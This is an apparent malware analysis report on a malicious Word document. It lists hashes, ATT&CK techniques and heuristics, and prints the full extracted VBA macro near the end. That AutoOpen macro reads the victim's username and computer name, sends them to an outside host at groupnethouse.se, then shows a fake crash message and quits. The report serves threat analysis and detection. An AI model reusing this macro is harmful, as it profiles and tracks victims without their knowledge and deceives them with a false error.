Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f60e66d5b16eb25…

MALICIOUS

Office (OLE)

29.5 KB Created: 2019-02-27 12:28:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 79f99f5e0a3040a658d85cf01347b981 SHA-1: 97b089efd1a34bb9a09c7153d73caa8ff84e63c6 SHA-256: 3f60e66d5b16eb257e260c0bff9b86acd110acecf23e4abc2ecf04d0d158c540
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro constructs a URL using the username and computer name, then attempts to download a payload from the specified host. This indicates an intent to download and execute a second-stage payload, likely leading to further compromise.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://groupnethouse.se:8080/wave0/?user= In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 979 bytes
SHA-256: 9457124251dd29cceb8bc57f993f7b8190f1e3fd40af03c596b04098fbc3dbff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim payload As String
Dim hostname As String
Dim username As String

computername = Environ$("computername")
username = Environ$("username")

Dim info
    info = Array(hostname, username)

payload = Join(info, "|")

Set request = CreateObject("MSXML2.ServerXMLHTTP")
    URL = "http://groupnethouse.se:8080/wave0/?user=" + username + "&machine=" + computername
    request.Open "GET", URL, False
    request.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    request.send ("")
    
    Msg = "Application crashing"
    MsgBox Msg, , "Incompatible Version", Err.HelpFile, Err.HelpContext

    Application.Quit
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.